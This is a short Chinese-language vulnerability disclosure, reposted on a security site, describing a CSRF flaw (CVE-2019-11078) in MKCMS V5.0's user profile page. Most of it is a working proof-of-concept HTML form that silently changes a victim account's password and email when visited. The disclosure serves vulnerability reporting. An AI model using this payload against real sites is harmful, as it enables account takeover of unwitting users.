MKCMS V5.0存在CSRF漏洞

颓废 2019年5月19日09:01:35评论748 views字数 770阅读2分34秒阅读模式

一、漏洞摘要

漏洞名称: MKCMS V5.0存在CSRF漏洞
上报日期: 2019-04-04
漏洞发现者: cisk
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0
CVE编号: CVE-2019-11078

二、漏洞概述

CSRF: ucenter/userinfo.php
post请求中没有带token,也没有验证Referer,导致产生csrf漏洞
MKCMS V5.0存在CSRF漏洞

三、利用方法

构造如下poc.html,并访问poc.html;将修改lduo123账号的密码

<html>   <body>   <script>history.pushState('', '', '/')</script>     <form action="http://v.micool.top/ucenter/userinfo.php" method="POST">       <input type="hidden" name="u&#95;name" value="lduo123" />       <input type="hidden" name="u&#95;password" value="123456" />       <input type="hidden" name="u&#95;phone" value="1314520" />       <input type="hidden" name="u&#95;qq" value="" />       <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />       <input type="hidden" name="save" value="" />       <input type="submit" value="Submit request" />     </form>       </body> </html>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:01:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MKCMS V5.0存在CSRF漏洞https://cn-sec.com/archives/68055.html

发表评论

匿名网友 填写信息